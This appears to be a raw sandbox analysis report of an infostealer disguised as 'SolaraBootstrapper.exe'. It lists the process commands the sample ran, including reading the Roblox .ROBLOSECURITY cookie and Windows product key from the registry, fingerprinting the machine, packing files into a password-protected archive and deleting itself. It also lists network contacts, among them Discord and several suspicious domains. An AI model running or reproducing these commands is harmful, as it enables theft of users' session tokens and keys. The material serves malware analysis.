C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5112"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 5112

C:\Windows\system32\taskkill.exe

taskkill /F /PID 5112

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2620"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2620"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 2620

C:\Windows\system32\taskkill.exe

taskkill /F /PID 2620

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI54202\rar.exe a -r -hp"clavvic" "C:\Users\Admin\AppData\Local\Temp\viM7y.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI54202\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI54202\rar.exe a -r -hp"clavvic" "C:\Users\Admin\AppData\Local\Temp\viM7y.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\Desktop\SolaraBootstrapper.exe""

C:\Windows\system32\PING.EXE

ping localhost -n 3

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 blank-7jdkg.in udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.180.3:443 gstatic.com tcp
GB 142.250.180.14:443 apis.google.com tcp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.46:443 play.google.com udp
US 8.8.8.8:53 46.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.130.233:443 discordapp.com tcp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
NL 23.62.61.97:443 www.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 r.bing.com udp
NL 23.62.61.97:443 r.bing.com tcp
NL 23.62.61.194:443 r.bing.com tcp
NL 23.62.61.194:443 r.bing.com tcp
NL 23.62.61.97:443 r.bing.com tcp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
IE 20.190.159.64:443 login.microsoftonline.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 services.bingapis.com udp
US 13.107.5.80:443 services.bingapis.com tcp
US 8.8.8.8:53 80.5.107.13.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.110.133:443 avatars.githubusercontent.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 167.154.64.172.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 154.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 collector.github.com udp
US 140.82.113.22:443 collector.github.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 140.82.113.22:443 collector.github.com tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 22.113.82.140.in-addr.arpa udp
US 8.8.8.8:53 210.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
GB 142.250.179.238:80 google.com tcp
GB 142.250.179.238:80 google.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:80 www.google.com tcp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.180.14:443 apis.google.com tcp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.46:443 play.google.com tcp
US 8.8.8.8:53 consent.google.com udp
GB 216.58.213.14:443 consent.google.com tcp
US 8.8.8.8:53 14.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
GB 142.250.179.238:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.179.238:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.179.238:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.179.238:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.179.238:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.179.238:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.179.238:443 encrypted-tbn0.gstatic.com udp
US 8.8.8.8:53 lh6.googleusercontent.com udp
GB 142.250.180.1:443 lh6.googleusercontent.com tcp
US 8.8.8.8:53 1.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 id.google.com udp
GB 142.250.178.3:443 id.google.com tcp
US 8.8.8.8:53 i.ytimg.com udp
GB 216.58.212.214:443 i.ytimg.com tcp
GB 216.58.212.214:443 i.ytimg.com tcp
GB 216.58.212.214:443 i.ytimg.com tcp
GB 216.58.212.214:443 i.ytimg.com tcp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
GB 216.58.212.238:443 www.youtube.com udp
US 8.8.8.8:53 img.youtube.com udp
GB 216.58.212.214:443 i.ytimg.com udp
GB 142.250.200.46:443 img.youtube.com udp
US 8.8.8.8:53 214.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 238.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
GB 142.250.178.2:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
GB 142.250.178.2:443 googleads.g.doubleclick.net udp
GB 216.58.213.6:443 static.doubleclick.net tcp
GB 142.250.200.10:443 jnn-pa.googleapis.com tcp
GB 142.250.200.10:443 jnn-pa.googleapis.com udp
GB 142.250.200.46:443 img.youtube.com udp
US 8.8.8.8:53 2.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 6.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 10.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.kingexploits.com udp
US 34.149.87.45:443 www.kingexploits.com tcp
US 34.149.87.45:443 www.kingexploits.com tcp
US 8.8.8.8:53 static.wixstatic.com udp
US 8.8.8.8:53 static.parastorage.com udp
US 34.149.87.45:443 www.kingexploits.com udp
US 8.8.8.8:53 dt3y1f1i1disy.cloudfront.net udp
US 34.49.229.81:443 static.parastorage.com tcp
US 34.49.229.81:443 static.parastorage.com tcp
US 8.8.8.8:53 siteassets.parastorage.com udp
US 8.8.8.8:53 frog.wix.com udp
US 8.8.8.8:53 panorama.wixapps.net udp
US 18.245.199.12:443 static.wixstatic.com tcp
US 18.245.199.12:443 static.wixstatic.com tcp
US 44.197.140.169:443 frog.wix.com tcp
US 34.49.229.81:443 siteassets.parastorage.com tcp
US 34.149.206.255:443 panorama.wixapps.net tcp
FR 52.222.153.25:443 dt3y1f1i1disy.cloudfront.net tcp
US 8.8.8.8:53 45.87.149.34.in-addr.arpa udp
US 8.8.8.8:53 81.229.49.34.in-addr.arpa udp
US 34.49.229.81:443 siteassets.parastorage.com udp
US 34.49.229.81:443 siteassets.parastorage.com udp
US 8.8.8.8:53 loaksandtheir.info udp
US 8.8.8.8:53 oldforeyesheh.info udp
US 8.8.8.8:53 ghabovethec.info udp
US 8.8.8.8:53 pogothere.xyz udp
GB 54.192.137.68:443 loaksandtheir.info tcp
US 104.21.30.57:443 oldforeyesheh.info tcp
GB 18.244.140.100:443 ghabovethec.info tcp
US 104.21.24.208:443 pogothere.xyz tcp
US 104.21.24.208:443 pogothere.xyz tcp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 12.199.245.18.in-addr.arpa udp
US 8.8.8.8:53 255.206.149.34.in-addr.arpa udp
US 8.8.8.8:53 25.153.222.52.in-addr.arpa udp
US 8.8.8.8:53 169.140.197.44.in-addr.arpa udp
US 8.8.8.8:53 38.201.222.52.in-addr.arpa udp
US 8.8.8.8:53 57.30.21.104.in-addr.arpa udp
US 8.8.8.8:53 68.137.192.54.in-addr.arpa udp
US 8.8.8.8:53 100.140.244.18.in-addr.arpa udp
US 8.8.8.8:53 208.24.21.104.in-addr.arpa udp
US 8.8.8.8:53 vetrainingukm.info udp
GB 163.70.147.35:443 www.facebook.com tcp
GB 18.245.162.117:443 vetrainingukm.info tcp
US 8.8.8.8:53 accounts.google.com udp
IE 209.85.203.84:443 accounts.google.com tcp
IE 209.85.203.84:443 accounts.google.com tcp
IE 209.85.203.84:443 accounts.google.com udp
US 8.8.8.8:53 117.162.245.18.in-addr.arpa udp
US 8.8.8.8:53 35.147.70.163.in-addr.arpa udp
US 8.8.8.8:53 84.203.85.209.in-addr.arpa udp
US 8.8.8.8:53 encrypted-vtbn0.gstatic.com udp
GB 216.58.201.110:443 encrypted-vtbn0.gstatic.com tcp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 repository-images.githubusercontent.com udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 camo.githubusercontent.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
GB 142.250.200.46:443 img.youtube.com udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 blank-bjlpt.in udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
GB 216.58.212.238:443 img.youtube.com udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.129.233:443 discordapp.com tcp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 8.8.8.8:53 24.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI23162\python311.dll

MD5 5f6fd64ec2d7d73ae49c34dd12cedb23
SHA1 c6e0385a868f3153a6e8879527749db52dce4125
SHA256 ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967
SHA512 c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

C:\Users\Admin\AppData\Local\Temp\_MEI23162\VCRUNTIME140.dll

MD5 49c96cecda5c6c660a107d378fdfc3d4
SHA1 00149b7a66723e3f0310f139489fe172f818ca8e
SHA256 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512 e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

memory/1580-25-0x00007FFD79730000-0x00007FFD79D19000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI23162\base_library.zip

MD5 32ede00817b1d74ce945dcd1e8505ad0
SHA1 51b5390db339feeed89bffca925896aff49c63fb
SHA256 4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a
SHA512 a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7

C:\Users\Admin\AppData\Local\Temp\_MEI23162\_ctypes.pyd

MD5 00f75daaa7f8a897f2a330e00fad78ac
SHA1 44aec43e5f8f1282989b14c4e3bd238c45d6e334
SHA256 9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f
SHA512 f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

C:\Users\Admin\AppData\Local\Temp\_MEI23162\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

C:\Users\Admin\AppData\Local\Temp\_MEI23162\libssl-3.dll

MD5 bf4a722ae2eae985bacc9d2117d90a6f
SHA1 3e29de32176d695d49c6b227ffd19b54abb521ef
SHA256 827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147
SHA512 dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73

C:\Users\Admin\AppData\Local\Temp\_MEI23162\_ssl.pyd

MD5 f9cc7385b4617df1ddf030f594f37323
SHA1 ebceec12e43bee669f586919a928a1fd93e23a97
SHA256 b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6
SHA512 3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb

C:\Users\Admin\AppData\Local\Temp\_MEI23162\_sqlite3.pyd

MD5 1a8fdc36f7138edcc84ee506c5ec9b92
SHA1 e5e2da357fe50a0927300e05c26a75267429db28
SHA256 8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882
SHA512 462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0

C:\Users\Admin\AppData\Local\Temp\_MEI23162\_socket.pyd

MD5 1a34253aa7c77f9534561dc66ac5cf49
SHA1 fcd5e952f8038a16da6c3092183188d997e32fb9
SHA256 dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f
SHA512 ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a

C:\Users\Admin\AppData\Local\Temp\_MEI23162\_queue.pyd

MD5 347d6a8c2d48003301032546c140c145
SHA1 1a3eb60ad4f3da882a3fd1e4248662f21bd34193
SHA256 e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192
SHA512 b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06

C:\Users\Admin\AppData\Local\Temp\_MEI23162\_lzma.pyd

MD5 542eab18252d569c8abef7c58d303547
SHA1 05eff580466553f4687ae43acba8db3757c08151
SHA256 d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9
SHA512 b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958

C:\Users\Admin\AppData\Local\Temp\_MEI23162\_hashlib.pyd

MD5 b227bf5d9fec25e2b36d416ccd943ca3
SHA1 4fae06f24a1b61e6594747ec934cbf06e7ec3773
SHA256 d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7
SHA512 c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

C:\Users\Admin\AppData\Local\Temp\_MEI23162\_decimal.pyd

MD5 e3fb8bf23d857b1eb860923ccc47baa5
SHA1 46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0
SHA256 7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3
SHA512 7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c

C:\Users\Admin\AppData\Local\Temp\_MEI23162\_bz2.pyd

MD5 c413931b63def8c71374d7826fbf3ab4
SHA1 8b93087be080734db3399dc415cc5c875de857e2
SHA256 17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293
SHA512 7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

C:\Users\Admin\AppData\Local\Temp\_MEI23162\unicodedata.pyd

MD5 8c42fcc013a1820f82667188e77be22d
SHA1 fba7e4e0f86619aaf2868cedd72149e56a5a87d4
SHA256 0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2
SHA512 3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

C:\Users\Admin\AppData\Local\Temp\_MEI23162\sqlite3.dll

MD5 dbc64142944210671cca9d449dab62e6
SHA1 a2a2098b04b1205ba221244be43b88d90688334c
SHA256 6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c
SHA512 3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

C:\Users\Admin\AppData\Local\Temp\_MEI23162\select.pyd

MD5 45d5a749e3cd3c2de26a855b582373f6
SHA1 90bb8ac4495f239c07ec2090b935628a320b31fc
SHA256 2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876
SHA512 c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

C:\Users\Admin\AppData\Local\Temp\_MEI23162\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI23162\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI23162\libcrypto-3.dll

MD5 78ebd9cb6709d939e4e0f2a6bbb80da9
SHA1 ea5d7307e781bc1fa0a2d098472e6ea639d87b73
SHA256 6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e
SHA512 b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122

C:\Users\Admin\AppData\Local\Temp\_MEI23162\blank.aes

MD5 922f95da5e45795ae8b28221654f26f6
SHA1 dfa0928ff66234e5eba44d08ea6e136596da1230
SHA256 e65f60d3db6f6ad652a81fb149be04b1c7a17f00777b33350e52a8810db68841
SHA512 3d58810228cab0d70a757f1b52d786938dcfab6cc281bf1a2b2cbe52af27b85f07578ac8830b42a77a227541e2a4d42f8c4bae7e83effe3cfc4a243b219823b1

memory/1580-31-0x00007FFD896C0000-0x00007FFD896E3000-memory.dmp

memory/1580-32-0x00007FFD919E0000-0x00007FFD919EF000-memory.dmp

memory/1580-54-0x00007FFD894D0000-0x00007FFD894FD000-memory.dmp

memory/1580-56-0x00007FFD8EA70000-0x00007FFD8EA89000-memory.dmp

memory/1580-59-0x00007FFD89400000-0x00007FFD89423000-memory.dmp

memory/1580-60-0x00007FFD88EF0000-0x00007FFD89067000-memory.dmp

memory/1580-62-0x00007FFD8DCB0000-0x00007FFD8DCC9000-memory.dmp

memory/1580-64-0x00007FFD79730000-0x00007FFD79D19000-memory.dmp

memory/1580-67-0x00007FFD893C0000-0x00007FFD893F3000-memory.dmp

memory/1580-66-0x00007FFD8EDB0000-0x00007FFD8EDBD000-memory.dmp

memory/1580-72-0x00007FFD78E00000-0x00007FFD79320000-memory.dmp

memory/1580-73-0x00000238AC710000-0x00000238ACC30000-memory.dmp

memory/1580-71-0x00007FFD892F0000-0x00007FFD893BD000-memory.dmp

memory/1580-76-0x00007FFD8A1A0000-0x00007FFD8A1B4000-memory.dmp

memory/1580-75-0x00007FFD896C0000-0x00007FFD896E3000-memory.dmp

memory/1580-80-0x00007FFD78A30000-0x00007FFD78B4C000-memory.dmp

memory/1580-79-0x00007FFD894C0000-0x00007FFD894CD000-memory.dmp

memory/3876-86-0x000001FBEEA40000-0x000001FBEEA62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lozbf41b.vw1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

\??\pipe\crashpad_3708_MSMFLDMNYTIFQHOD

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 481e5a63ab627f474e7406859a742abc
SHA1 adf952634978d42e343896ac546763cc6e7635fa
SHA256 ce32fe7b6fec708c52b5293b3ea0de2f0030be59644c9a635882bb7273b664a6
SHA512 8d3d8329276e6fac80fbc4d6cf4ca0d05cd336c7a0e85cafe2fd121e783af1c013347909454aab63bd0c51b6f37317958f23608b980d4a5764d23cdc9aa12f95

C:\Windows\system32\drivers\etc\hosts

MD5 f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1 e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256 a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512 c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

\??\c:\Users\Admin\AppData\Local\Temp\wfwswdeb\wfwswdeb.cmdline

MD5 9223ddd1e48084ce339b8b7f7b527404
SHA1 da04141ba6668908bd5f3dcb20a2febdc5bcd420
SHA256 a16437e81b14ae9981208d9be186c681aa614101c67efb57709384053349ba4e
